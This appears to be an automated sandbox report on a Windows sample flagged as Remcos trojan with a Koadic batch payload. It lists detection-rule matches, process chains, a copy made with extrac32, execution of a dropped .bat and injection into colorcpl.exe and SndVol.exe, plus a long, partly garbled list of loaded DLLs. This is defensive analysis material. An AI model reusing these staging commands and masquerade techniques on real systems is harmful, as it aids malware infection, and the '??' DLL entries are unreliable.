                  Source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\Public\Libraries\OcihlomcO.bat, type: DROPPED | Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@16/11@4/3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04677952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 5_2_04677952
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_1C647952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 8_2_1C647952
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028A7F8E GetDiskFreeSpaceA, 0_2_028A7F8E
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028B9E10 CreateToolhelp32Snapshot, 0_2_028B9E10
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028B6D84 CoCreateInstance, 0_2_028B6D84
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0467B4A8 FindResourceA,LoadResource,LockResource,SizeofResource, 5_2_0467B4A8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0467AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 5_2_0467AC78
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | File created: C:\Users\Public\Libraries\Null
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
Source: C:\Windows\SysWOW64\SndVol.exe | Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
Source: C:\Windows\SysWOW64\colorcpl.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-TALGAI
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OcihlomcO.bat" "
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: XY2I8rWLkM.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | File read: C:\Users\user\Desktop\XY2I8rWLkM.exe
Source: unknown | Process created: C:\Users\user\Desktop\XY2I8rWLkM.exe "C:\Users\user\Desktop\XY2I8rWLkM.exe"
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OcihlomcO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\XY2I8rWLkM.exe C:\\Users\\Public\\Libraries\\Ocihlomc.PIF
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\Public\Libraries\Ocihlomc.PIF "C:\Users\Public\Libraries\Ocihlomc.PIF"
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: unknown | Process created: C:\Users\Public\Libraries\Ocihlomc.PIF "C:\Users\Public\Libraries\Ocihlomc.PIF"
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: archiveint.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: url.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: endpointdlp.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: eamsi.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: am.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
